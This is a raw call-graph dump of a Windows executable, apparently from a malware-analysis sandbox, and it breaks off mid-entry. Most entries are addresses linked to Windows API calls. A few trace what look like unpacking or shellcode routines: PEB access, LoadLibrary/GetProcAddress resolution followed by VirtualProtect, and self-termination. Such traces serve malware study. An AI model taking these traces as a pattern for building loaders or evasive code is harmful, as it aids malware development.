SetTimer RegisterClipboardFormatW 94249->94253 94255 9a1e88 94250->94255 94256 933781 94250->94256 94251->94270 94257 9a1da3 94252->94257 94258 9337da KillTimer 94252->94258 94260 93381f CreatePopupMenu 94253->94260 94253->94270 94304 974ddd 60 API calls _memset 94255->94304 94261 933836 94256->94261 94262 933789 94256->94262 94264 9a1da8 94257->94264 94265 9a1ddc MoveWindow 94257->94265 94295 933847 Shell_NotifyIconW _memset 94258->94295 94259 9a1e27 94299 94e312 331 API calls Mailbox 94259->94299 94260->94270 94288 94eb83 94261->94288 94268 933794 94262->94268 94274 9a1e6d 94262->94274 94271 9a1dcb SetFocus 94264->94271 94272 9a1dac 94264->94272 94265->94270 94275 93379f 94268->94275 94276 9a1e58 94268->94276 94271->94270 94272->94275 94278 9a1db5 94272->94278 94273 9337ed 94296 93390f DeleteObject DestroyWindow Mailbox 94273->94296 94274->94247 94303 96a5f3 48 API calls 94274->94303 94275->94247 94300 933847 Shell_NotifyIconW _memset 94275->94300 94302 9755bd 70 API calls _memset 94276->94302 94277 9a1e9a 94277->94247 94277->94270 94297 932ff6 16 API calls 94278->94297 94283 9a1e68 94283->94270 94284->94247 94286 9a1e4c 94301 934ffc 67 API calls _memset 94286->94301 94289 94ec1c 94288->94289 94290 94eb9a _memset 94288->94290 94289->94270 94305 9351af 94290->94305 94292 94ebc1 94293 94ec05 KillTimer SetTimer 94292->94293 94294 9a3c7a Shell_NotifyIconW 94292->94294 94293->94289 94294->94293 94295->94273 94296->94270 94297->94270 94298->94259 94299->94275 94300->94286 94301->94284 94302->94283 94303->94284 94304->94277 94306 9352a2 Mailbox 94305->94306 94307 9351cb 94305->94307 94306->94292 94327 936b0f 94307->94327 94310 9351e6 94312 936a63 48 API calls 94310->94312 94311 9a3ca1 LoadStringW 94314 9a3cbb 94311->94314 94313 9351fb 94312->94313 94313->94314 94315 93520c 94313->94315 94316 93510d 48 API calls 94314->94316 94317 9352a7 94315->94317 94318 935216 94315->94318 94321 9a3cc5 94316->94321 94341 936eed 94317->94341 94332 93510d 94318->94332 94324 935220 _memset _wcscpy 94321->94324 94345 93518c 94321->94345 94323 9a3ce7 94326 93518c 48 API calls 94323->94326 94325 935288 Shell_NotifyIconW 94324->94325 94325->94306 94326->94324 94328 94f4ea 48 API calls 94327->94328 94329 936b34 94328->94329 94330 936b4a 48 API calls 94329->94330 94331 9351d9 94330->94331 94331->94310 94331->94311 94333 93511f 94332->94333 94334 9a1be7 94332->94334 94355 93b384 94333->94355 94364 96a58f 48 API calls _memcpy_s 94334->94364 94337 93512b 94337->94324 94338 9a1bf1 94339 936eed 48 API calls 94338->94339 94340 9a1bf9 Mailbox 94339->94340 94342 936f00 94341->94342 94343 936ef8 94341->94343 94342->94324 94370 93dd47 48 API calls _memcpy_s 94343->94370 94346 935197 94345->94346 94347 9a1ace 94346->94347 94348 93519f 94346->94348 94349 936b4a 48 API calls 94347->94349 94371 935130 94348->94371 94352 9a1adb __NMSG_WRITE 94349->94352 94351 9351aa 94351->94323 94353 94ee75 48 API calls 94352->94353 94354 9a1b07 _memcpy_s 94353->94354 94356 93b392 94355->94356 94363 93b3c5 _memcpy_s 94355->94363 94357 93b3b8 94356->94357 94358 93b3fd 94356->94358 94356->94363 94365 93bb85 94357->94365 94360 94f4ea 48 API calls 94358->94360 94361 93b407 94360->94361 94362 94f4ea 48 API calls 94361->94362 94362->94363 94363->94337 94364->94338 94366 93bb9b 94365->94366 94369 93bb96 _memcpy_s 94365->94369 94367 9a1b77 94366->94367 94368 94ee75 48 API calls 94366->94368 94368->94369 94369->94363 94370->94342 94372 93513f __NMSG_WRITE 94371->94372 94373 935151 94372->94373 94374 9a1b27 94372->94374 94376 93bb85 48 API calls 94373->94376 94375 936b4a 48 API calls 94374->94375 94378 9a1b34 94375->94378 94377 93515e _memcpy_s 94376->94377 94377->94351 94379 94ee75 48 API calls 94378->94379 94380 9a1b57 _memcpy_s 94379->94380 94381 9a197b 94386 94dd94 94381->94386 94385 9a198a 94387 94f4ea 48 API calls 94386->94387 94388 94dd9c 94387->94388 94390 94ddb0 94388->94390 94394 94df3d 94388->94394 94393 950f0a 52 API calls __cinit 94390->94393 94393->94385 94395 94df46 94394->94395 94396 94dda8 94394->94396 94426 950f0a 52 API calls __cinit 94395->94426 94398 94ddc0 94396->94398 94399 93d7f7 48 API calls 94398->94399 94400 94ddd7 GetVersionExW 94399->94400 94401 936a63 48 API calls 94400->94401 94402 94de1a 94401->94402 94427 94dfb4 94402->94427 94407 9a24c8 94409 94dea4 GetCurrentProcess 94444 94df5f LoadLibraryA GetProcAddress 94409->94444 94410 94df31 GetSystemInfo 94415 94df0e 94410->94415 94411 94dee3 94438 94e00c 94411->94438 94414 94debb 94414->94410 94414->94411 94418 94df21 94415->94418 94419 94df1c FreeLibrary 94415->94419 94418->94390 94419->94418 94420 94df29 GetSystemInfo 94422 94df03 94420->94422 94421 94def9 94441 94dff4 94421->94441 94422->94415 94425 94df09 FreeLibrary 94422->94425 94425->94415 94426->94396 94428 94dfbd 94427->94428 94429 93b18b 48 API calls 94428->94429 94430 94de22 94429->94430 94431 936571 94430->94431 94432 93657f 94431->94432 94433 93b18b 48 API calls 94432->94433 94434 93658f 94433->94434 94434->94407 94435 94df77 94434->94435 94445 94df89 94435->94445 94449 94e01e 94438->94449 94442 94e00c 2 API calls 94441->94442 94443 94df01 GetNativeSystemInfo 94442->94443 94443->94422 94444->94414 94446 94dea0 94445->94446 94447 94df92 LoadLibraryA 94445->94447 94446->94409 94446->94414 94447->94446 94448 94dfa3 GetProcAddress 94447->94448 94448->94446 94450 94def1 94449->94450 94451 94e027 LoadLibraryA 94449->94451 94450->94420 94450->94421 94451->94450 94452 94e038 GetProcAddress 94451->94452 94452->94450 94453 9a8eb8 94457 97a635 94453->94457 94455 9a8ec3 94456 97a635 84 API calls 94455->94456 94456->94455 94458 97a66f 94457->94458 94462 97a642 94457->94462 94458->94455 94459 97a671 94489 94ec4e 81 API calls 94459->94489 94461 97a676 94468 93936c 94461->94468 94462->94458 94462->94459 94462->94461 94466 97a669 94462->94466 94464 97a67d 94465 93510d 48 API calls 94464->94465 94465->94458 94488 944525 61 API calls _memcpy_s 94466->94488 94469 939380 94468->94469 94470 939384 94468->94470 94469->94464 94471 9a4cbd __i64tow 94470->94471 94472 9a4bbf 94470->94472 94473 939398 94470->94473 94479 9393b0 __itow Mailbox _wcscpy 94470->94479 94474 9a4bc8 94472->94474 94475 9a4ca5 94472->94475 94490 95172b 80 API calls 4 library calls 94473->94490 94474->94479 94481 9a4be7 94474->94481 94497 95172b 80 API calls 4 library calls 94475->94497 94478 94f4ea 48 API calls 94480 9393ba 94478->94480 94479->94478 94480->94469 94491 93ce19 94480->94491 94482 94f4ea 48 API calls 94481->94482 94484 9a4c04 94482->94484 94485 94f4ea 48 API calls 94484->94485 94486 9a4c2a 94485->94486 94486->94469 94487 93ce19 48 API calls 94486->94487 94487->94469 94488->94458 94489->94461 94490->94479 94492 93ce28 __NMSG_WRITE 94491->94492 94493 94ee75 48 API calls 94492->94493 94494 93ce50 _memcpy_s 94493->94494 94495 94f4ea 48 API calls 94494->94495 94496 93ce66 94495->94496 94496->94469 94497->94479 94498 18b9838 94512 18b7488 94498->94512 94500 18b9904 94515 18b9728 94500->94515 94518 18ba928 GetPEB 94512->94518 94514 18b7b13 94514->94500 94516 18b9731 Sleep 94515->94516 94517 18b973f 94516->94517 94519 18ba952 94518->94519 94519->94514 94520 a55f70 94521 a55f80 94520->94521 94522 a5609a LoadLibraryA 94521->94522 94527 a560df VirtualProtect VirtualProtect 94521->94527 94523 a560b1 94522->94523 94523->94521 94526 a560c3 GetProcAddress 94523->94526 94525 a56144 94525->94525 94526->94523 94528 a560d9 ExitProcess 94526->94528 94527->94525 94529 9a9bec 94565 940ae0 _memcpy_s Mailbox 94529->94565 94531 941526 Mailbox 94694 97cc5c 86 API calls 4 library calls 94531->94694 94534 94146e 94544 936eed 48 API calls 94534->94544 94537 940509 94697 97cc5c 86 API calls 4 library calls 94537->94697 94538 94f4ea 48 API calls 94557 93fec8 94538->94557 94540 941473 94696 97cc5c 86 API calls 4 library calls 94540->94696 94541 9aa246 94548 936eed 48 API calls 94541->94548 94542 9aa922 94559 93ffe1 Mailbox 94544->94559 94547 936eed 48 API calls 94547->94557 94548->94559 94549 93d7f7 48 API calls 94549->94557 94550 9697ed InterlockedDecrement 94550->94557 94551 9aa873 94552 9aa30e 94552->94559 94692 9697ed InterlockedDecrement 94552->94692 94553 93ce19 48 API calls 94553->94565 94554 950f0a 52 API calls __cinit 94554->94557 94556 9aa973 94698 97cc5c 86 API calls 4 library calls 94556->94698 94557->94534 94557->94537 94557->94538 94557->94540 94557->94541 94557->94547 94557->94549 94557->94550 94557->94552 94557->94554 94557->94556 94557->94559 94561 9415b5 94557->94561 94689 941820 331 API calls 2 library calls 94557->94689 94690 941d10 59 API calls Mailbox 94557->94690 94560 9aa982 94695 97cc5c 86 API calls 4 library calls 94561->94695 94563 94f4ea 48 API calls 94563->94565 94565->94531 94565->94553 94565->94557 94565->94559 94565->94563 94566 9aa706 94565->94566 94568 9697ed InterlockedDecrement 94565->94568 94572 93fe30 94565->94572 94601 990d09 94565->94601 94604 97b55b 94565->94604 94608 990d1d 94565->94608 94611 98f0ac 94565->94611 94643 97a6ef 94565->94643 94649 98e822 94565->94649 94691 98ef61 82 API calls 2 library calls 94565->94691 94693 97cc5c 86 API calls 4 library calls 94566->94693 94568->94565 94573 93fe50 94572->94573 94585 93fe7e 94572->94585 94574 94f4ea 48 API calls 94573->94574 94574->94585 94575 94146e 94576 936eed 48 API calls 94575->94576 94583 93ffe1 94576->94583 94577 9697ed InterlockedDecrement 94577->94585 94578 93d7f7 48 API calls 94578->94585 94579 940509 94704 97cc5c 86 API calls 4 library calls 94579->94704 94582 941473 94703 97cc5c 86 API calls 4 library calls 94582->94703 94583->94565 94584 936eed 48 API calls 94584->94585 94585->94575 94585->94577 94585->94578 94585->94579 94585->94582 94585->94583 94585->94584 94587 94f4ea 48 API calls 94585->94587 94588 9aa246 94585->94588 94594 950f0a 52 API calls __cinit 94585->94594 94595 9aa30e 94585->94595 94597 9aa973 94585->94597 94600 9415b5 94585->94600 94699 941820 331 API calls 2 library calls 94585->94699 94700 941d10 59 API calls Mailbox 94585->94700 94587->94585 94590 936eed 48 API calls 94588->94590 94589 9aa922 94589->94565 94590->94583 94593 9aa873 94593->94565 94594->94585 94595->94583 94701 9697ed InterlockedDecrement 94595->94701 94705 97cc5c 86 API calls 4 library calls 94597->94705 94599 9aa982 94702 97cc5c 86 API calls 4 library calls 94600->94702 94706 98f8ae 94601->94706 94603 990d19 94603->94565 94605 97b564 94604->94605 94606 97b569 94604->94606 94823 97a4d5 94605->94823 94606->94565 94609 98f8ae 129 API calls 94608->94609 94610 990d2d 94609->94610 94610->94565 94612 93d7f7 48 API calls 94611->94612 94613 98f0c0 94612->94613 94614 93d7f7 48 API calls 94613->94614 94615 98f0c8 94614->94615 94616 93d7f7 48 API calls 94615->94616 94617 98f0d0 94616->94617 94618 93936c 81 API calls 94617->94618 94633 98f0de 94618->94633 94619 936a63 48 API calls 94619->94633 94620 98f2cc 94621 98f2f9 Mailbox 94620->94621 94856 936b68 48 API calls 94620->94856 94621->94565 94623 98f2b3 94624 93518c 48 API calls 94623->94624 94626 98f2c0 94624->94626 94625 98f2ce 94628 93518c 48 API calls 94625->94628 94631 93510d 48 API calls 94626->94631 94627 93c799 48 API calls 94627->94633 94632 98f2dd 94628->94632 94629 936eed 48 API calls 94629->94633 94630 93bdfa 48 API calls 94634 98f175 CharUpperBuffW 94630->94634 94631->94620 94635 93510d 48 API calls 94632->94635 94633->94619 94633->94620 94633->94621 94633->94623 94633->94625 94633->94627 94633->94629 94633->94630 94636 93bdfa 48 API calls 94633->94636 94640 93936c 81 API calls 94633->94640 94641 93518c 48 API calls 94633->94641 94642 93510d 48 API calls 94633->94642 94845 93d645 94634->94845 94635->94620 94637 98f23a CharUpperBuffW 94636->94637 94855 94d922 55 API calls 2 library calls 94637->94855 94640->94633 94641->94633 94642->94633 94644 97a6fb 94643->94644 94645 94f4ea 48 API calls 94644->94645 94646 97a709 94645->94646 94647 97a717 94646->94647 94648 93d7f7 48 API calls 94646->94648 94647->94565 94648->94647 94650 98e868 94649->94650 94651 98e84e 94649->94651 94861 98ccdc 48 API calls 94650->94861 94860 97cc5c 86 API calls 4 library calls 94651->94860 94654 98e871 94655 93fe30 330 API calls 94654->94655 94656 98e8cf 94655->94656 94657 98e96a 94656->94657 94659 98e916 94656->94659 94688 98e860 Mailbox 94656->94688 94658 98e978 94657->94658 94661 98e9c7 94657->94661 94880 97a69d 48 API calls 94658->94880 94862 979b72 48 API calls 94659->94862 94664 93936c 81 API calls 94661->94664 94661->94688 94663 98e949 94863 9445e0 94663->94863 94667 98e9e1 94664->94667 94665 98e99b 94881 93bc74 48 API calls 94665->94881 94669 93bdfa 48 API calls 94667->94669 94671 98ea05 CharUpperBuffW 94669->94671 94670 98e9a3 Mailbox 94882 943200 94670->94882 94672 98ea1f 94671->94672 94674 98ea72 94672->94674 94675 98ea26 94672->94675 94676 93936c 81 API calls 94674->94676 94908 979b72 48 API calls 94675->94908 94677 98ea7a 94676->94677 94909 931caa 49 API calls 94677->94909 94680 98ea54 94681 9445e0 330 API calls 94680->94681 94681->94688 94682 98ea84 94683 93936c 81 API calls 94682->94683 94682->94688 94684 98ea9f 94683->94684 94910 93bc74 48 API calls 94684->94910 94686 98eaaf 94687 943200 330 API calls 94686->94687 94687->94688 94688->94565 94689->94557 94690->94557 94691->94565 94692->94559 94693->94531 94694->94559 94695->94559 94696->94551 94697->94542 94698->94560 94699->94585 94700->94585 94701->94583 94702->94583 94703->94593 94704->94589 94705->94599 94707 93936c 81 API calls 94706->94707 94708 98f8ea 94707->94708 94710 98f92c Mailbox 94708->94710 94742 990567 94708->94742 94710->94603 94711 98fb8b 94712 98fcfa 94711->94712 94716 98fb95 94711->94716 94805 990688 89 API calls Mailbox 94712->94805 94715 98fd07 94715->94716 94717 98fd13 94715->94717 94755 98f70a 94716->94755 94717->94710 94718 93936c 81 API calls 94736 98f984 Mailbox 94718->94736 94723 98fbc9 94769 94ed18 94723->94769 94726 98fbfd 94776 94c050 94726->94776 94727 98fbe3 94775 97cc5c 86 API calls 4 library calls 94727->94775 94730 98fbee GetCurrentProcess TerminateProcess 94730->94726 94731 98fc14 94741 98fc3e 94731->94741 94787 941b90 94731->94787 94732 98fd65 94732->94710 94738 98fd7e FreeLibrary 94732->94738 94734 98fc2d 94803 99040f 105 API calls _free 94734->94803 94735 941b90 48 API calls 94735->94741 94736->94710 94736->94711 94736->94718 94736->94736 94773 9929e8 48 API calls _memcpy_s 94736->94773 94774 98fda5 60 API calls 2 library calls 94736->94774 94738->94710 94741->94732 94741->94735 94804 93dcae 50 API calls Mailbox 94741->94804 94806 99040f 105 API calls _free 94741->94806 94743 93bdfa 48 API calls 94742->94743 94744 990582 CharLowerBuffW 94743->94744 94807 971f11 94744->94807 94748 93d7f7 48 API calls 94749 9905bb 94748->94749 94814 9369e9 48 API calls _memcpy_s 94749->94814 94751 9905d2 94752 93b18b 48 API calls 94751->94752 94754 9905de Mailbox 94752->94754 94753 99061a Mailbox 94753->94736 94754->94753 94815 98fda5 60 API calls 2 library calls 94754->94815 94756 98f725 94755->94756 94760 98f77a 94755->94760 94757 94f4ea 48 API calls 94756->94757 94759 98f747 94757->94759 94758 94f4ea 48 API calls 94758->94759 94759->94758 94759->94760 94761 990828 94760->94761 94762 990a53 Mailbox 94761->94762 94768 99084b _strcat _wcscpy __NMSG_WRITE 94761->94768 94762->94723 94763 93cf93 58 API calls 94763->94768 94764 93d286 48 API calls 94764->94768 94765 93936c 81 API calls 94765->94768 94766 95395c 47 API calls std::exception::_Copy_str 94766->94768 94768->94762 94768->94763 94768->94764 94768->94765 94768->94766 94818 978035 50 API calls __NMSG_WRITE 94768->94818 94770 94ed2d 94769->94770 94771 94edc5 VirtualProtect 94770->94771 94772 94ed93 94770->94772 94771->94772 94772->94726 94772->94727 94773->94736 94774->94736 94775->94730 94777 94c064 94776->94777 94779 94c069 Mailbox 94776->94779 94819 94c1af 48 API calls 94777->94819 94785 94c077 94779->94785 94820 94c15c 48 API calls 94779->94820 94781 94f4ea 48 API calls 94783 94c108 94781->94783 94782 94c152 94782->94731 94784 94f4ea 48 API calls 94783->94784 94786 94c113 94784->94786 94785->94781 94785->94782 94786->94731 94786->94786 94788 941cf6 94787->94788 94791 941ba2 94787->94791 94788->94734 94789 941bae 94794 941bb9 94789->94794 94822 94c15c 48 API calls 94789->94822 94791->94789 94792 94f4ea 48 API calls 94791->94792 94793 9a49c4 94792->94793 94795 94f4ea 48 API calls 94793->94795 94796 941c5d 94794->94796 94797 94f4ea 48 API calls 94794->94797 94802 9a49cf 94795->94802 94796->94734 94798 941c9f 94797->94798 94799 941cb2 94798->94799 94821 932925 48 API calls 94798->94821 94799->94734 94801 94f4ea 48 API calls 94801->94802 94802->94789 94802->94801 94803->94741 94804->94741 94805->94715 94806->94741 94808 971f3b __NMSG_WRITE 94807->94808 94809 971f79 94808->94809 94810 971f6f 94808->94810 94813 971ffa 94808->94813 94809->94748 94809->94754 94810->94809 94816 94d37a 60 API calls 94810->94816 94813->94809 94817 94d37a 60 API calls 94813->94817 94814->94751 94815->94753 94816->94810 94817->94813 94818->94768 94819->94779 94820->94785 94821->94799 94822->94794 94824 97a4ec 94823->94824 94837 97a5ee 94823->94837 94825 97a5d4 Mailbox 94824->94825 94827 97a58b 94824->94827 94830 97a4fd 94824->94830 94826 94f4ea 48 API calls 94825->94826 94842 97a54c _memcpy_s Mailbox 94826->94842 94828 94f4ea 48 API calls 94827->94828 94828->94842 94829 97a51a 94831 97a555 94829->94831 94832 97a545 94829->94832 94829->94842 94830->94829 94834 94f4ea 48 API calls 94830->94834 94836 94f4ea 48 API calls 94831->94836 94835 94f4ea 48 API calls 94832->94835 94833 94f4ea 48 API calls 94833->94837 94834->94829 94835->94842 94838 97a55b 94836->94838 94837->94606 94843 979d2d 48 API calls 94838->94843 94840 97a567 94844 94e65e 50 API calls 94840->94844 94842->94833 94843->94840 94844->94842 94846 93d654 94845->94846 94853 93d67e 94845->94853 94847 93d6c2 94846->94847 94848 93d65b 94846->94848 94854 93d6ab 94847->94854 94859 94dce0 53 API calls 94847->94859 94850 93d666 94848->94850 94848->94854 94857 93d9a0 53 API calls __cinit 94850->94857 94853->94633 94854->94853 94858 94dce0 53 API calls 94854->94858 94855->94633 94856->94621 94857->94853 94858->94853 94859->94854 94860->94688 94861->94654 94862->94663 94864 944637 94863->94864 94865 94479f 94863->94865 94866 944643 94864->94866 94867 9a6e05 94864->94867 94868 93ce19 48 API calls 94865->94868 94970 944300 331 API calls _memcpy_s 94866->94970 94870 98e822 331 API calls 94867->94870 94875 9446e4 Mailbox 94868->94875 94872 9a6e11 94870->94872 94871 944739 Mailbox 94871->94688 94872->94871 94971 97cc5c 86 API calls 4 library calls 94872->94971 94874 944659 94874->94871 94874->94872 94874->94875 94911 976524 94875->94911 94914 986ff0 94875->94914 94923 97fa0c 94875->94923 94964 934252 94875->94964 94880->94665 94881->94670 96009 93bd30 94882->96009 94884 943267 94904 943313 _memcpy_s Mailbox 94884->94904 96082 94c36b 86 API calls 94884->96082 94886 94c3c3 48 API calls 94886->94904 94889 93fe30 331 API calls 94889->94904 94890 93d645 53 API calls 94890->94904 94891 94c2d6 48 API calls 94891->94904 94898 94f4ea 48 API calls 94898->94904 94899 97cc5c 86 API calls 94899->94904 94903 936eed 48 API calls 94903->94904 94904->94886 94904->94889 94904->94890 94904->94891 94904->94898 94904->94899 94904->94903 94906 93dcae 50 API calls 94904->94906 94907 943635 Mailbox 94904->94907 96014 932b7a 94904->96014 96021 93e8d0 94904->96021 96083 93d9a0 53 API calls __cinit 94904->96083 96084 93d8c0 53 API calls 94904->96084 96085 98f320 331 API calls 94904->96085 96086 98f5ee 331 API calls 94904->96086 96087 931caa 49 API calls 94904->96087 96088 98cda2 82 API calls Mailbox 94904->96088 96089 9780e3 53 API calls 94904->96089 96090 93d764 55 API calls 94904->96090 96091 93d6e9 94904->96091 96095 97c942 50 API calls 94904->96095 94906->94904 94907->94688 94908->94680 94909->94682 94910->94686 94972 976ca9 GetFileAttributesW 94911->94972 94915 93936c 81 API calls 94914->94915 94916 98702a 94915->94916 94976 93b470 94916->94976 94918 98703a 94919 98705f 94918->94919 94920 93fe30 331 API calls 94918->94920 94922 987063 94919->94922 95004 93cdb9 48 API calls 94919->95004 94920->94919 94922->94871 94924 97fa1c __ftell_nolock 94923->94924 94925 97fa44 94924->94925 95104 93d286 48 API calls 94924->95104 94927 93936c 81 API calls 94925->94927 94928 97fa5e 94927->94928 94929 97fb92 94928->94929 94930 97fa80 94928->94930 94931 97fb68 94928->94931 94929->94871 94932 93936c 81 API calls 94930->94932 95020 9341a9 94931->95020 94938 97fa8c _wcscpy _wcschr 94932->94938 94935 97fb8e 94935->94929 94937 93936c 81 API calls 94935->94937 94936 9341a9 136 API calls 94936->94935 94939 97fbc7 94937->94939 94943 97fab0 _wcscat _wcscpy 94938->94943 94947 97fade _wcscat 94938->94947 95044 951dfc 94939->95044 94941 93936c 81 API calls 94942 97fafc _wcscpy 94941->94942 95105 9772cb GetFileAttributesW 94942->95105 94945 93936c 81 API calls 94943->94945 94945->94947 94946 97fb1c __NMSG_WRITE 94946->94929 94949 93936c 81 API calls 94946->94949 94947->94941 94948 97fbeb _wcscat _wcscpy 94951 93936c 81 API calls 94948->94951 94950 97fb48 94949->94950 95106 9760dd 77 API calls 4 library calls 94950->95106 94953 97fc82 94951->94953 95047 97690b 94953->95047 94954 97fb5c 94954->94929 94956 97fca2 94957 976524 3 API calls 94956->94957 94958 97fcb1 94957->94958 94959 93936c 81 API calls 94958->94959 94961 97fce2 94958->94961 94960 97fccb 94959->94960 95053 97bfa4 94960->95053 94963 934252 84 API calls 94961->94963 94963->94929 94965 93425c 94964->94965 94967 934263 94964->94967 94966 9535e4 __fcloseall 83 API calls 94965->94966 94966->94967 94968 934283 FreeLibrary 94967->94968 94969 934272 94967->94969 94968->94969 94969->94871 94970->94874 94971->94871 94973 976529 94972->94973 94974 976cc4 FindFirstFileW 94972->94974 94973->94871 94974->94973 94975 976cd9 FindClose 94974->94975 94975->94973 94977 936b0f 48 API calls 94976->94977 94999 93b495 94977->94999 94978 93b69b 95007 93ba85 94978->95007 94980 93b6b5 Mailbox 94980->94918 94983 93bcce 48 API calls 94983->94999 94984 93ba85 48 API calls 94984->94999 94985 9a397b 95018 9726bc 88 API calls 4 library calls 94985->95018 94988 93b9e4 95019 9726bc 88 API calls 4 library calls 94988->95019 94989 9a3973 94989->94980 94992 9a3989 94993 93ba85 48 API calls 94992->94993 94993->94989 94994 9a3909 94996 936b4a 48 API calls 94994->94996 94995 93bb85 48 API calls 94995->94999 94998 9a3914 94996->94998 95002 94f4ea 48 API calls 94998->95002 94999->94978 94999->94983 94999->94984 94999->94985 94999->94988 94999->94994 94999->94995 95000 93bdfa 48 API calls 94999->95000 95003 9a3939 _memcpy_s 94999->95003 95005 93c413 59 API calls 94999->95005 95006 93bc74 48 API calls 94999->95006 95015 93c6a5 49 API calls 94999->95015 95016 93c799 48 API calls _memcpy_s 94999->95016 95001 93b66c CharUpperBuffW 95000->95001 95001->94999 95002->95003 95017 9726bc 88 API calls 4 library calls 95003->95017 95004->94922 95005->94999 95006->94999 95008 93bb25 95007->95008 95011 93ba98 _memcpy_s 95007->95011 95010 94f4ea 48 API calls 95008->95010 95009 94f4ea 48 API calls 95012 93ba9f 95009->95012 95010->95011 95011->95009 95013 94f4ea 48 API calls 95012->95013 95014 93bac8 95012->95014 95013->95014 95014->94980 95015->94999 95016->94999 95017->94989 95018->94992 95019->94989 95107 934214 95020->95107 95025 9341d4 LoadLibraryExW 95117 934291 95025->95117 95026 9a4f73 95027 934252 84 API calls 95026->95027 95029 9a4f7a 95027->95029 95031 934291 3 API calls 95029->95031 95033 9a4f82 95031->95033 95143 9344ed 95033->95143 95034 9341fb 95034->95033 95035 934207 95034->95035 95037 934252 84 API calls 95035->95037 95039 93420c 95037->95039 95039->94935 95039->94936 95041 9a4fa9 95151 934950 95041->95151 95631 951e46 95044->95631 95048 976918 _wcschr __ftell_nolock 95047->95048 95049 951dfc __wsplitpath 47 API calls 95048->95049 95052 97692e _wcscat _wcscpy 95048->95052 95050 97695d 95049->95050 95051 951dfc __wsplitpath 47 API calls 95050->95051 95051->95052 95052->94956 95054 97bfb1 __ftell_nolock 95053->95054 95055 94f4ea 48 API calls 95054->95055 95056 97c00e 95055->95056 95057 9347b7 48 API calls 95056->95057 95058 97c018 95057->95058 95059 97bdb4 GetSystemTimeAsFileTime 95058->95059 95060 97c023 95059->95060 95061 934517 83 API calls 95060->95061 95062 97c036 _wcscmp 95061->95062 95063 97c107 95062->95063 95064 97c05a 95062->95064 95065 97c56d 94 API calls 95063->95065 95687 97c56d 95064->95687 95081 97c0d3 _wcscat 95065->95081 95068 951dfc __wsplitpath 47 API calls 95073 97c088 _wcscat _wcscpy 95068->95073 95069 9344ed 64 API calls 95070 97c12c 95069->95070 95071 9344ed 64 API calls 95070->95071 95074 97c13c 95071->95074 95072 97c110 95072->94961 95076 951dfc __wsplitpath 47 API calls 95073->95076 95075 9344ed 64 API calls 95074->95075 95077 97c157 95075->95077 95076->95081 95078 9344ed 64 API calls 95077->95078 95079 97c167 95078->95079 95080 9344ed 64 API calls 95079->95080 95082 97c182 95080->95082 95081->95069 95081->95072 95083 9344ed 64 API calls 95082->95083 95084 97c192 95083->95084 95085 9344ed 64 API calls 95084->95085 95086 97c1a2 95085->95086 95087 9344ed 64 API calls 95086->95087 95088 97c1b2 95087->95088 95657 97c71a GetTempPathW GetTempFileNameW 95088->95657 95090 97c1be 95091 953499 117 API calls 95090->95091 95093 97c1cf 95091->95093 95093->95072 95095 9344ed 64 API calls 95093->95095 95103 97c289 95093->95103 95658 952aae 95093->95658 95094 97c294 95094->95072 95096 97c342 CopyFileW 95094->95096 95100 97c2b8 95094->95100 95095->95093 95097 97c32d 95096->95097 95098 97c358 95096->95098 95097->95072 95684 97c6d9 CreateFileW 95097->95684 95098->95072 95693 97b965 95100->95693 95671 9535e4 95103->95671 95104->94925 95105->94946 95106->94954 95156 934339 95107->95156 95110 934244 FreeLibrary 95111 9341bb 95110->95111 95114 953499 95111->95114 95113 93423c 95113->95110 95113->95111 95164 9534ae 95114->95164 95116 9341c8 95116->95025 95116->95026 95364 9342e4 95117->95364 95119 9342b8 95121 9342c1 FreeLibrary 95119->95121 95122 9341ec 95119->95122 95121->95122 95124 934380 95122->95124 95125 94f4ea 48 API calls 95124->95125 95126 934395 95125->95126 95372 9347b7 95126->95372 95128 9343a1 _memcpy_s 95129 9343dc 95128->95129 95130 9344d1 95128->95130 95131 934499 95128->95131 95132 934950 57 API calls 95129->95132 95386 97c750 93 API calls 95130->95386 95375 93406b CreateStreamOnHGlobal 95131->95375 95140 9343e5 95132->95140 95135 9344ed 64 API calls 95135->95140 95136 934479 95136->95034 95138 9a4ed7 95139 934517 83 API calls 95138->95139 95141 9a4eeb 95139->95141 95140->95135 95140->95136 95140->95138 95381 934517 95140->95381 95142 9344ed 64 API calls 95141->95142 95142->95136 95144 9a4fc0 95143->95144 95145 9344ff 95143->95145 95410 95381e 95145->95410 95148 97bf5a 95608 97bdb4 95148->95608 95150 97bf70 95150->95041 95152 9a5002 95151->95152 95153 93495f 95151->95153 95613 953e65 95153->95613 95155 934967 95160 93434b 95156->95160 95159 934321 LoadLibraryA GetProcAddress 95159->95113 95161 93422f 95160->95161 95162 934354 LoadLibraryA 95160->95162 95161->95113 95161->95159 95162->95161 95163 934365 GetProcAddress 95162->95163 95163->95161 95167 9534ba _flsall 95164->95167 95165 9534cd 95212 957c0e 47 API calls __getptd_noexit 95165->95212 95167->95165 95169 9534fe 95167->95169 95168 9534d2 95213 956e10 8 API calls __Wcsftime_l 95168->95213 95183 95e4c8 95169->95183 95172 953503 95173 95350c 95172->95173 95174 953519 95172->95174 95214 957c0e 47 API calls __getptd_noexit 95173->95214 95175 953543 95174->95175 95176 953523 95174->95176 95197 95e5e0 95175->95197 95215 957c0e 47 API calls __getptd_noexit 95176->95215 95178 9534dd _flsall @_EH4_CallFilterFunc@8 95178->95116 95184 95e4d4 _flsall 95183->95184 95217 957cf4 95184->95217 95186 95e559 95253 9569d0 47 API calls std::exception::_Copy_str 95186->95253 95187 95e552 95224 95e5d7 95187->95224 95190 95e560 95190->95187 95192 95e56f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 95190->95192 95191 95e5cc _flsall 95191->95172 95192->95187 95195 95e4e2 95195->95186 95195->95187 95227 957d7c 95195->95227 95251 954e5b 48 API calls __lock 95195->95251 95252 954ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 95195->95252 95206 95e600 __wopenfile 95197->95206 95198 95e61a 95272 957c0e 47 API calls __getptd_noexit 95198->95272 95199 95e7d5 95199->95198 95204 95e838 95199->95204 95201 95e61f 95273 956e10 8 API calls __Wcsftime_l 95201->95273 95203 95354e 95216 953570 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95203->95216 95269 9663c9 95204->95269 95206->95198 95206->95199 95206->95206 95274 95185b 59 API calls 3 library calls 95206->95274 95208 95e7ce 95208->95199 95275 95185b 59 API calls 3 library calls 95208->95275 95210 95e7ed 95210->95199 95276 95185b 59 API calls 3 library calls 95210->95276 95212->95168 95213->95178 95214->95178 95215->95178 95216->95178 95218 957d05 95217->95218 95219 957d18 RtlEnterCriticalSection 95217->95219 95220 